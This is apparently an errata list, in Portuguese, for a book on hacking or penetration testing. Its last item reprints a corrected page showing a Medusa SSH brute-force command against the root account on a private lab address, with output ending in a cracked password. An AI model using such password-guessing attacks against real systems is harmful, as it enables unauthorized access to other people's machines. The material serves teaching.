

LISTA DE ERRATAS

Caros leitores,

Apesar de todo esforço de escrita e revisão, encontramos alguns pequenos detalhes. Os erros serão corrigidos na próxima versão do livro.

Segue abaixo lista de erros já identificados:

- 1.) Algumas páginas possuem o termo **“blackhat”** escrito sem separação. O correto é **“Black Hat”**, tradução Chapéu Preto escrito separadamente.
- 2.) **Pag. 121**, erro de impressão: Ataque mostrando como quebrar senha com a ferramenta Medusa. “Escrito no teste anterior, utilizamos o comando.....”. O correto é “no teste a seguir utilizamos o comando....”.
- 3.) **Pag. 121**, erro de impressão: resultado do ataque utilizando Medusa, não mostra a última linha que apresenta a quebra de senha. Segue abaixo a tela corrigida:

```
root@root:~# medusa -h 192.168.32.132 -n 22 -u root -P /root/senhas_ssh.txt -M ssh

Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
The default build of Libssh2 is to use OpenSSL for crypto. Several Linux
distributions (e.g. Debian, Ubuntu) build it to use Libcrypt. Unfortunately,
the implementation within Libssh2 of libcrypt appears to be broken and is
not thread safe. If you run multiple concurrent Medusa SSH connections, you
are likely to experience segmentation faults. Please help Libssh2 fix this
issue or encourage your distro to use the default Libssh2 build options.

ACCOUNT CHECK: [ssh] Host: 192.168.32.132 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: jacare (1 of 14
complete)
ACCOUNT CHECK: [ssh] Host: 192.168.32.132 (1 of 1, 0 complete) User:
ACCOUNT CHECK: [ssh] Host: 192.168.32.132 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: senha (2 of 14
complete)
ACCOUNT CHECK: [ssh] Host: 192.168.32.132 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: joao (3 of 14 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.32.132 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: maria (4 of 14
complete)
ACCOUNT CHECK: [ssh] Host: 192.168.32.132 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123 (5 of 14 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.32.132 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 1234 (6 of 14 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.32.132 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 12345 (7 of 14
complete)
ACCOUNT CHECK: [ssh] Host: 192.168.32.132 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (8 of 14
complete)
ACCOUNT CHECK: [ssh] Host: 192.168.32.132 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 1234567 (9 of 14
complete)
ACCOUNT CHECK: [ssh] Host: 192.168.32.132 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 12345678 (10 of 14
complete)
ACCOUNT FOUND: [ssh] Host: 192.168.32.132 User: root Password: 12345678 [SUCCESS]
```